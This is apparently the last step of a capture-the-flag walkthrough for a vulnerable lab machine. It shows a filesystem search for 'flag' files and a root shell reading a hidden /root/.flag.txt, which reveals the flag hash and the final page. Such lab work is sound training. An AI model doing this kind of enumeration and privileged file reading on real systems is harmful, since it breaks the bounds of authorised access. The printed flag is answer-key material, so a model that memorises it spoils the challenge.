/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man1/doveadm-flags.1.gz
/usr/src/linux-headers-3.13.0-32/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-3.13.0-32/arch/c6x/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/frv/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/parisc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/score/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/s390/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/um/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/unicore32/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/kernel/cpu/mkcapflags.sh
/usr/src/linux-headers-3.13.0-32/arch/x86/include/asm/processor-flags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/include/uapi/asm/processor-flags.h
/usr/src/linux-headers-3.13.0-32/arch/mn10300/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/openrisc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/hexagon/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/alpha/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/sh/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/metag/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/m32r/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arm64/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/powerpc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arm/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/microblaze/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/xtensa/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/tile/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags_32.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags_64.h
/usr/src/linux-headers-3.13.0-32/arch/sparc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/ia64/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/mips/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/avr32/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/arch-v32/arch/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/cris/include/arch-v10/arch/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/m68k/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/blackfin/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/include/uapi/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32/include/uapi/linux/tty_flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/pageblock-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-flags-layout.h
/usr/src/linux-headers-3.13.0-32/include/linux/page-debug-flags.h
/usr/src/linux-headers-3.13.0-32/include/linux/irqflags.h
/usr/src/linux-headers-3.13.0-32/include/trace/events/gfpflags.h
/usr/src/linux-headers-3.13.0-32/include/asm-generic/irqflags.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/arch/hweight/cflags.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/pageflags
/usr/src/linux-headers-3.13.0-32-generic/include/config/zone/dma/flag.h
/usr/src/linux-headers-3.13.0-32-generic/include/config/trace/irqflags
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/pageblock-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/kernel-page-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-flags-layout.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/page-debug-flags.h
/usr/src/linux-headers-3.13.0-32-generic/include/linux/irqflags.h
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/proc/kpageflags
/proc/sys/kernel/acpi_video_flags
/var/www/html/006-final/x8vtfinal-flag.gif
/var/www/html/006-final/xvf7-flag
/var/www/html/gnocertdir/pix/i/unflagged.png
/var/www/html/gnocertdir/pix/i/flagged.png
/var/www/html/gnocertdir/question/flags.js
/var/www/html/gnocertdir/question/toggleflag.php
/var/www/html/gnocertdir/theme/afterburner/pix_core/i/unflagged.png
/var/www/html/gnocertdir/theme/afterburner/pix_core/i/flagged.png
/var/www/html/gnocertdir/theme/mymobile/pix_core/i/unflagged.png
/var/www/html/gnocertdir/theme/mymobile/pix_core/i/flagged.png
/var/www/html/gnocertdir/mod/quiz/pix/navflagged.png
/root/.flag.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/system/cpu/cpu0/microcode/processor_flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS4/flags
/sys/devices/platform/serial8250/tty/ttyS5/flags
/sys/devices/platform/serial8250/tty/ttyS6/flags
/sys/devices/platform/serial8250/tty/ttyS7/flags
/sys/devices/platform/serial8250/tty/ttyS8/flags
/sys/devices/platform/serial8250/tty/ttyS9/flags
/sys/devices/platform/serial8250/tty/ttyS10/flags
/sys/devices/platform/serial8250/tty/ttyS11/flags
/sys/devices/platform/serial8250/tty/ttyS12/flags
/sys/devices/platform/serial8250/tty/ttyS13/flags
/sys/devices/platform/serial8250/tty/ttyS14/flags
/sys/devices/platform/serial8250/tty/ttyS15/flags
/sys/devices/platform/serial8250/tty/ttyS16/flags
/sys/devices/platform/serial8250/tty/ttyS17/flags
/sys/devices/platform/serial8250/tty/ttyS18/flags
/sys/devices/platform/serial8250/tty/ttyS19/flags
/sys/devices/platform/serial8250/tty/ttyS20/flags
/sys/devices/platform/serial8250/tty/ttyS21/flags
/sys/devices/platform/serial8250/tty/ttyS22/flags
/sys/devices/platform/serial8250/tty/ttyS23/flags
/sys/devices/platform/serial8250/tty/ttyS24/flags
/sys/devices/platform/serial8250/tty/ttyS25/flags
/sys/devices/platform/serial8250/tty/ttyS26/flags
/sys/devices/platform/serial8250/tty/ttyS27/flags
/sys/devices/platform/serial8250/tty/ttyS28/flags
/sys/devices/platform/serial8250/tty/ttyS29/flags
/sys/devices/platform/serial8250/tty/ttyS30/flags
/sys/devices/platform/serial8250/tty/ttyS31/flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/module/scsi_mod/parameters/default_dev_flags

There is a hidden /root/.flag.txt (and the find output also shows a suspicious /var/www/html/006-final/xvf7-flag directory).

Read it:

# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/

Visit http://severnaya-station.com/006-final/xvf7-flag/

[screenshot: the final page at /006-final/xvf7-flag/]